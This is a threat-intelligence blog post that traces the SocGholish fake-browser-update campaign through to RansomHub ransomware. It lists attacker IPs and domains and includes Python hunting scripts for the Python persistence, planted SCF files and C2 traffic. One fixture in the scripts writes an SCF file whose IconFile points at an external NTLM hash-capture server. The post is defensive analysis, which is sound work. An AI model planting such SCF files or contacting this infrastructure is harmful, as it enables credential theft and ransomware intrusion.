
SocGholish Now Stages Directly Into RansomHub. The Fake Browser Update You've Seen for Three Years Is Now a Ransomware Loader.

  • Writer: Patrick Duggan
  • 6 min read

SocGholish is one of the most durable initial access campaigns in the threat landscape. TA569, the group behind it, has been running fake browser update lures on compromised legitimate websites since at least 2017. The lure is always the same: visit a compromised site, see a modal that looks like a Chrome or Firefox update prompt, download a ZIP, execute a JavaScript loader. If you work in enterprise security, you have seen this campaign in someone's inbox, in a phishing awareness training, in an incident report. It is background noise at this point.


The Darktrace report published this week makes it stop being background noise. SocGholish is now staging directly into RansomHub — the dominant ransomware-as-a-service operation that consolidated market share after the LockBit and ALPHV disruptions. The fake browser update you have dismissed for three years is now the first link in a kill chain that ends in encrypted infrastructure and a ransom demand.



The kill chain


Nine stages. The first five use only legitimate infrastructure. That is why it works.


1 — Compromised legitimate website: TA569 compromises real sites through unpatched CMS plugins or RCE vulnerabilities, injecting JavaScript that reroutes traffic. Not a malicious domain — a site the victim already trusts.


2 — Keitaro TDS (176.53.147.97 / packedbrick.com / rednosehorse.com / blackshelter.org / blacksaltys.com): The traffic distribution system fingerprints every visitor before deciding what to serve. Sandboxes, researchers, and consumer connections see nothing. Enterprise users on corporate devices see the payload.


3 — Fake browser update modal: The profiled visitor sees a Chrome or Firefox update prompt. Download a ZIP. Execute a JavaScript loader. One click. No exploit required.


4 — SocGholish C2 check-in (msbdz.crm.bestintownpro.com → 166.88.182.126): The loader checks in over HTTPS/443. Indistinguishable from normal web traffic.


5 — Python backdoor (files.pythonhosted.org → 151.101.1.223): The secondary stage drops a Python backdoor with scheduled-task persistence. It phones home via the Python Package Index CDN — a domain almost no enterprise blocks because it serves legitimate developer traffic.


6 — Two weeks of silence: No ransomware yet. The actor is mapping the environment: domain controllers, backup systems, data stores worth threatening. One documented case: fourteen days undetected between backdoor deployment and encryption.


7 — Credential harvesting (NTLM capture server: 161.35.56.33): SCF (Shell Command File) planted on SMB shares. Windows Explorer auto-authenticates to the UNC path when browsing the share, handing the actor the user's NTLM hash. No interaction required beyond opening the folder.


8 — RansomHub C2 (185.174.101.240 / 185.174.101.69 / 108.181.182.143 — port-hopping on 2308/2311/2313): RansomHub infrastructure contacted over non-standard ephemeral ports via TLS. Port-hopping evades monitors that alert on specific destination ports.


9 — Encryption + ransom demand: Infrastructure locked. Data threatened for publication. This is where the victim finds out.



Stage 1 — The compromised website and the TDS


The infection begins on a legitimate website that has been compromised — not a malicious domain, not a phishing link, but a site the victim already trusts and visits for a normal reason. TA569 compromises these sites through unpatched CMS plugins or direct RCE vulnerabilities and injects JavaScript that redirects to their traffic distribution system.


The TDS is Keitaro — a commercially available traffic distribution and tracking platform that threat actors use for the same reason legitimate advertisers do: to segment visitors and serve different content to different audiences. The SocGholish TDS cluster runs through [176.53.147.97](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=176.53.147.97), with distribution nodes at packedbrick.com, rednosehorse.com, blackshelter.org, and blacksaltys.com. Keitaro fingerprints the visitor before deciding what to deliver. If the traffic looks like a sandbox, a security researcher, or a low-value consumer connection, the visit terminates cleanly. The legitimate website just loads. If the traffic fingerprints as an enterprise user on a corporate device, the fake update modal appears.


This is what makes SocGholish difficult to detect from the outside. The malicious behavior is conditional. The compromised site serves clean content to most visitors. Only specifically profiled enterprise targets see the payload.



Stage 2 — The fake update and the Python backdoor


The modal presents as a browser update. It is not a technical exploit — it requires the user to click Download and execute the JavaScript loader. The social engineering holds because the update modal looks exactly like what users expect to see when their browser needs updating. The ZIP contains a JavaScript loader that checks in to the SocGholish C2 at msbdz.crm.bestintownpro.com ([166.88.182.126](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=166.88.182.126)) over HTTPS/443.


The secondary stage is where SocGholish has evolved from prior reporting. The Python backdoor maintains persistence through a scheduled task — Python-based persistence is documented as new for this malware family. The backdoor connects to files.pythonhosted.org ([151.101.1.223](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=151.101.1.223)), which is a legitimate PyPI file hosting domain. Outbound connections to the Python package index rarely trigger enterprise security controls because they are routine in development environments. The C2 traffic hides inside the expected noise of developer tooling.
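The persistence described above is a scheduled task whose action runs a Python interpreter. The following is an added example, not code from the original post or the Darktrace report: it parses the TaskContent XML that Windows Security event 4698 ("A scheduled task has been created") carries, flags tasks whose executable is a Python interpreter, and escalates when the same user visited a host outside an allow-list in the preceding 24 hours. The event records, proxy records, user names, the `.invalid` host and the `KNOWN_HOSTS` allow-list are constructed for the illustration.

```python
"""Hunt for Python-interpreter scheduled tasks and correlate them with recent web visits.

Added example, not code from the Darktrace report or the original post.
Inputs are constructed in-memory samples shaped like Windows Security event
4698 ("A scheduled task has been created") and a web-proxy log; field names,
timestamps and the known-host allow-list are assumptions for the illustration.
"""
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

# Namespace used by real Task Scheduler task definitions.
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# python.exe, pythonw.exe, py.exe, pyw.exe, optionally versioned (python3.11.exe)
PYTHON_EXE = re.compile(r"(^|[\\/])(python|pythonw|py|pyw)(\d+(\.\d+)?)?\.exe$", re.I)

# Constructed sample events: time, user, task name, TaskContent XML.
SAMPLE_4698 = [
    {"time": "2025-11-03T14:12:07", "user": "CORP\\jdoe", "task": "\\OneDriveSyncUpdate",
     "content": """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions><Exec>
    <Command>C:\\Users\\jdoe\\AppData\\Local\\Programs\\Python\\Python311\\pythonw.exe</Command>
    <Arguments>C:\\Users\\jdoe\\AppData\\Roaming\\update.py</Arguments>
  </Exec></Actions>
</Task>"""},
    {"time": "2025-11-03T15:00:00", "user": "CORP\\asmith", "task": "\\DevTools\\Lint",
     "content": """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions><Exec><Command>C:\\Python312\\python.exe</Command>
    <Arguments>-m lint</Arguments></Exec></Actions>
</Task>"""},
    {"time": "2025-11-03T16:30:00", "user": "CORP\\bwong", "task": "\\Vendor\\Updater",
     "content": """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions><Exec><Command>"C:\\Program Files\\Vendor\\updater.exe"</Command></Exec></Actions>
</Task>"""},
]

# Constructed proxy records; the .invalid host stands in for a compromised site.
SAMPLE_PROXY = [
    {"time": "2025-11-03T13:48:21", "user": "CORP\\jdoe", "host": "www.local-news-site.invalid"},
    {"time": "2025-11-01T09:00:00", "user": "CORP\\jdoe", "host": "mail.corp.example"},
    {"time": "2025-11-03T14:00:00", "user": "CORP\\asmith", "host": "files.pythonhosted.org"},
]
KNOWN_HOSTS = {"mail.corp.example", "files.pythonhosted.org", "update.microsoft.com"}  # assumption


def is_python_interpreter(command: str) -> bool:
    """True if the task's executable is a Python interpreter binary."""
    return bool(PYTHON_EXE.search(command.strip().strip('"')))


def parse_exec_command(task_xml: str) -> str:
    """Pull the <Exec><Command> element out of a 4698 TaskContent payload."""
    root = ET.fromstring(task_xml)
    cmd = root.find(f".//{TASK_NS}Exec/{TASK_NS}Command")
    return cmd.text.strip() if cmd is not None and cmd.text else ""


def recent_unfamiliar_visits(user, when, proxy_log, known_hosts, window=timedelta(hours=24)):
    """Hosts outside the allow-list that `user` visited in the `window` before `when`."""
    return sorted({r["host"] for r in proxy_log
                   if r["user"] == user and r["host"] not in known_hosts
                   and timedelta(0) <= when - datetime.fromisoformat(r["time"]) <= window})


def hunt_python_tasks(events, proxy_log, known_hosts):
    """Flag Python-interpreter tasks; escalate when an unfamiliar site preceded them."""
    hits = []
    for ev in events:
        cmd = parse_exec_command(ev["content"])
        if not is_python_interpreter(cmd):
            continue
        when = datetime.fromisoformat(ev["time"])
        visits = recent_unfamiliar_visits(ev["user"], when, proxy_log, known_hosts)
        hits.append({"task": ev["task"], "user": ev["user"], "command": cmd,
                     "prior_unfamiliar_sites": visits,
                     "severity": "high" if visits else "medium"})
    return hits


if __name__ == "__main__":
    for hit in hunt_python_tasks(SAMPLE_4698, SAMPLE_PROXY, KNOWN_HOSTS):
        print(hit["severity"].upper(), hit["user"], hit["task"], hit["command"],
              hit["prior_unfamiliar_sites"])
```

A developer's lint task created by a user who only visited allow-listed hosts stays at medium; the task running `pythonw.exe` against a script in `AppData\Roaming`, created minutes after a visit to an unfamiliar site, is the pattern worth paging on. Event 4698 only exists when task-creation auditing is enabled, so confirm that audit policy before building the detection on it.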



Stage 3 — Two weeks of silence before encryption


The documented case in the Darktrace report involves two weeks of undetected movement between the Python backdoor landing and the RansomHub encryption event. This is the access-first-movement-next-disruption-last pattern. The actor is not in a hurry to encrypt. They are building understanding of the environment — what domain controllers exist, what backup systems are accessible, what databases contain the data worth threatening to publish.


The credential harvesting technique in this campaign uses WebDAV forced authentication: SCF files (Shell Command Files) placed on SMB shares containing an IconFile directive pointing to a UNC path on [161.35.56.33](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=161.35.56.33) (`\\161.35.56.33\share\icon.ico`). When Windows Explorer renders the share contents, it automatically attempts to authenticate to the UNC path using the current user's NTLM credentials. The hash is captured on the attacker's server. This technique does not require user interaction beyond browsing to the share. It is not new — it has been documented for years — but it is still effective because most enterprise environments allow outbound SMB to the internet and most security tools do not flag NTLM authentication against an unfamiliar external IP as an alert.
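A direct way to find planted SCF files before anyone browses the share is to scan the share itself for the IconFile directive and check where it points. The following is an added example, not code from the original post or the Darktrace report: it walks a directory standing in for an SMB share, reads every `.scf` file, extracts the IconFile target and flags any whose UNC host is a public IP or a dotted name outside the organisation's DNS suffix. The demo share, the internal server name `FILESRV01` and the `.corp.example` suffix are constructed; the external address in the suspicious sample is the capture server named in the post.

```python
"""Scan a file share for SCF files whose IconFile points at an external UNC host.

Added example, not code from the original post or the Darktrace report.
It builds a throwaway directory standing in for an SMB share, containing one
constructed benign SCF and one constructed SCF that points at the NTLM capture
IP named in the post; the internal DNS suffix is an assumption.
"""
import ipaddress
import os
import re
import tempfile

ICONFILE_RE = re.compile(r"^\s*IconFile\s*=\s*(.+?)\s*$", re.I | re.M)
UNC_HOST_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")
INTERNAL_SUFFIXES = (".corp.example",)  # assumption: the org's internal DNS suffix


def unc_host(path: str):
    """Return the host component of a \\\\host\\share\\... path, else None."""
    m = UNC_HOST_RE.match(path.strip().strip('"'))
    return m.group(1) if m else None


def is_external_host(host: str, internal_suffixes=INTERNAL_SUFFIXES) -> bool:
    """A public IP, or a dotted name outside the internal suffixes, counts as external."""
    host = host.lower()
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        # Single-label names resolve internally; dotted names must carry our suffix.
        return "." in host and not host.endswith(internal_suffixes)


def scan_share(root: str):
    """Walk `root`, read every *.scf, and flag IconFile targets on external hosts."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            for m in ICONFILE_RE.finditer(text):
                host = unc_host(m.group(1))
                if host and is_external_host(host):
                    findings.append({"file": full, "iconfile": m.group(1), "host": host})
    return findings


def build_demo_share() -> str:
    """Create a temp directory with constructed sample SCF files and return its path."""
    root = tempfile.mkdtemp(prefix="scf-demo-")
    os.makedirs(os.path.join(root, "Finance", "Q3"))
    # Benign (constructed): icon hosted on an internal file server.
    with open(os.path.join(root, "Finance", "folder.scf"), "w") as fh:
        fh.write("[Shell]\r\nIconFile=\\\\FILESRV01\\icons\\folder.ico\r\n")
    # Suspicious (constructed): icon path on the external capture server from the post.
    with open(os.path.join(root, "Finance", "Q3", "desktop.scf"), "w") as fh:
        fh.write("[Shell]\r\nIconFile=\\\\161.35.56.33\\share\\icon.ico\r\n")
    return root


if __name__ == "__main__":
    for f in scan_share(build_demo_share()):
        print("EXTERNAL ICONFILE:", f["file"], "->", f["iconfile"])
```

Run it against the UNC path of each share from a host that can read them. The scan is a hunt, not a fix: the durable mitigations are blocking outbound TCP 445 at the egress firewall and setting the `Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers` policy, so that a planted file has nowhere to send the hash.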



Stage 4 — RansomHub


The terminal stage is RansomHub deployment. RansomHub is the ransomware-as-a-service that absorbed affiliates and market position from LockBit and ALPHV after their disruptions in 2024 and 2025. It is currently the dominant RaaS platform by activity volume. The C2 infrastructure observed in this campaign uses port-hopping across ephemeral ports 2308, 2311, and 2313 against three servers: [185.174.101.240](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=185.174.101.240), [185.174.101.69](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=185.174.101.69), and [108.181.182.143](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=108.181.182.143). The port-hopping is an evasion technique against network monitoring that triggers on specific destination ports rather than behavioral patterns.



The IOCs we indexed this morning


All seven infrastructure IPs from this campaign were absent from our corpus before today. They are now indexed at confidence 85–90:


  • [176.53.147.97](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=176.53.147.97) — Keitaro TDS cluster

  • [166.88.182.126](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=166.88.182.126) — SocGholish primary C2

  • [185.174.101.240](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=185.174.101.240) — RansomHub C2 (port-hopping on 2308/2311/2313)

  • [185.174.101.69](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=185.174.101.69) — RansomHub C2

  • [108.181.182.143](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=108.181.182.143) — RansomHub C2

The NTLM capture server [161.35.56.33](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=161.35.56.33) and the PyPI exfil anchor [151.101.1.223](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=151.101.1.223) are supplemental hunting indicators — the latter is a legitimate CDN IP shared across many Python package requests, so context matters before blocking.



What to hunt for


The SocGholish detection problem is that each stage uses legitimate infrastructure. The TDS uses a real traffic distribution platform. The C2 uses HTTPS on port 443. The backdoor phones home to the Python package index. The credential harvest abuses Windows' built-in authentication behavior. Each individual signal has a benign explanation. The chain is the indicator.


  • Outbound NTLM authentication to external IPs from workstations (specifically auth attempts to UNC paths outside your network)

  • New scheduled tasks with Python interpreter as the executable, created within 24 hours of a user visiting an unfamiliar external site

  • DNS resolution of bestintownpro.com variants or packedbrick.com / rednosehorse.com / blackshelter.org / blacksaltys.com

  • Outbound connections to the RansomHub /24 range [185.174.101.0/24](https://analytics.dugganusa.com/stix/register?ref=ioc-click&q=185.174.101.0) on non-standard ports

The two-week dwell before encryption is the window defenders have if they catch stage 2 or stage 3. Missing stage 1 — the browser update — is expected, because it requires user interaction and the social engineering is good. Catching the Python backdoor persistence or the NTLM auth behavior is realistic with the right detections in place.
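The hunt list above says the chain, not any single signal, is the indicator. The following is an added example, not code from the original post or the Darktrace report: it runs the network-side hunts (DNS for the TDS and C2 domains, workstation SMB to a public address, non-standard-port connections into the RansomHub /24, and port-hopping against one destination) over constructed flow and DNS records, then reports how many stages fired per source host. The log lines, the workstation addresses `10.20.4.17` / `10.20.4.22` and the internal server `10.20.1.5` are constructed; the domains and networks are the ones named in the post.

```python
"""Run the network hunts over constructed flow and DNS records and score each host by stages fired.

Added example, not code from the original post or the Darktrace report.
The log lines are constructed; the workstation and internal server addresses are
assumptions. Indicator domains and networks are the ones named in the post.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime

WATCH_DOMAINS = {"bestintownpro.com", "packedbrick.com", "rednosehorse.com",
                 "blackshelter.org", "blacksaltys.com"}
WATCH_NETS = [ipaddress.ip_network("185.174.101.0/24")]
STANDARD_PORTS = {80, 443}

# Constructed firewall/flow records: one infected workstation (10.20.4.17), one clean one.
FLOW_LOG = [
    "2025-11-03T14:15:02 src=10.20.4.17 dst=166.88.182.126 dport=443",
    "2025-11-05T09:02:11 src=10.20.4.17 dst=161.35.56.33 dport=445",
    "2025-11-17T03:10:44 src=10.20.4.17 dst=185.174.101.240 dport=2308",
    "2025-11-17T03:11:02 src=10.20.4.17 dst=185.174.101.240 dport=2311",
    "2025-11-17T03:12:30 src=10.20.4.17 dst=185.174.101.69 dport=2313",
    "2025-11-03T10:00:00 src=10.20.4.22 dst=10.20.1.5 dport=445",
    "2025-11-03T10:05:00 src=10.20.4.22 dst=151.101.1.223 dport=443",
]
# Constructed DNS query records.
DNS_LOG = [
    "2025-11-03T14:11:20 src=10.20.4.17 query=rednosehorse.com",
    "2025-11-03T14:11:50 src=10.20.4.17 query=msbdz.crm.bestintownpro.com",
    "2025-11-03T10:04:58 src=10.20.4.22 query=files.pythonhosted.org",
]


def parse_kv(line):
    """'<iso-timestamp> k=v k=v ...' -> dict with a parsed 'ts' field."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.fromisoformat(ts)
    return rec


def domain_matches(qname, watch=WATCH_DOMAINS):
    """True for a watched domain or any subdomain of it (case- and trailing-dot-insensitive)."""
    q = qname.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in watch)


def hunt_dns(lines):
    """Queries for the TDS / C2 domains or their subdomains."""
    return [r for r in map(parse_kv, lines) if domain_matches(r["query"])]


def hunt_external_smb(lines):
    """Workstation SMB (445) to a public address: the forced-auth NTLM leak path."""
    return [r for r in map(parse_kv, lines)
            if int(r["dport"]) == 445 and ipaddress.ip_address(r["dst"]).is_global]


def hunt_watch_nets(lines):
    """Any non-standard-port connection into the RansomHub /24."""
    return [r for r in map(parse_kv, lines)
            if any(ipaddress.ip_address(r["dst"]) in n for n in WATCH_NETS)
            and int(r["dport"]) not in STANDARD_PORTS]


def hunt_port_hopping(lines, min_ports=2, window_seconds=600):
    """Same src->dst pair using several distinct high ports inside a short window."""
    by_pair = defaultdict(list)
    for r in map(parse_kv, lines):
        if int(r["dport"]) >= 1024:
            by_pair[(r["src"], r["dst"])].append(r)
    hits = []
    for (src, dst), recs in by_pair.items():
        recs.sort(key=lambda r: r["ts"])
        ports = sorted({int(r["dport"]) for r in recs})
        span = (recs[-1]["ts"] - recs[0]["ts"]).total_seconds()
        if len(ports) >= min_ports and span <= window_seconds:
            hits.append({"src": src, "dst": dst, "ports": ports})
    return hits


def chain_by_host(flow_lines, dns_lines):
    """The chain is the indicator: collect which stages fired for each source host."""
    stages = defaultdict(set)
    for r in hunt_dns(dns_lines):
        stages[r["src"]].add("tds_or_c2_dns")
    for r in hunt_external_smb(flow_lines):
        stages[r["src"]].add("external_smb_auth")
    for r in hunt_watch_nets(flow_lines):
        stages[r["src"]].add("ransomhub_net_nonstd_port")
    for h in hunt_port_hopping(flow_lines):
        stages[h["src"]].add("port_hopping")
    return {host: sorted(s) for host, s in stages.items()}


if __name__ == "__main__":
    for host, fired in chain_by_host(FLOW_LOG, DNS_LOG).items():
        print(f"{host}: {len(fired)} stage(s) -> {', '.join(fired)}")
```

The clean workstation's SMB to an internal server and its HTTPS to the PyPI CDN produce nothing, which is the point made about `151.101.1.223` above: that address only becomes interesting in the company of the other stages. The port-hopping check deliberately keys on the source/destination pair and a short window rather than on specific port numbers, so a change from 2308/2311/2313 to other ephemeral ports still fires.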


SocGholish has been running for seven years. Adding RansomHub as the terminal payload is not a technical innovation — it is a business decision by TA569 to monetize their access inventory at current ransomware market rates. The initial access broker and the ransomware operator have found each other. The fake update that security teams have been dismissing as commodity noise is now the front door to a ransomware event.


We are at 95 percent on the above — documented kill chain, named infrastructure, confirmed RansomHub deployment in observed incidents. The RansomHub affiliation may be opportunistic and shift to different ransomware operators over time.



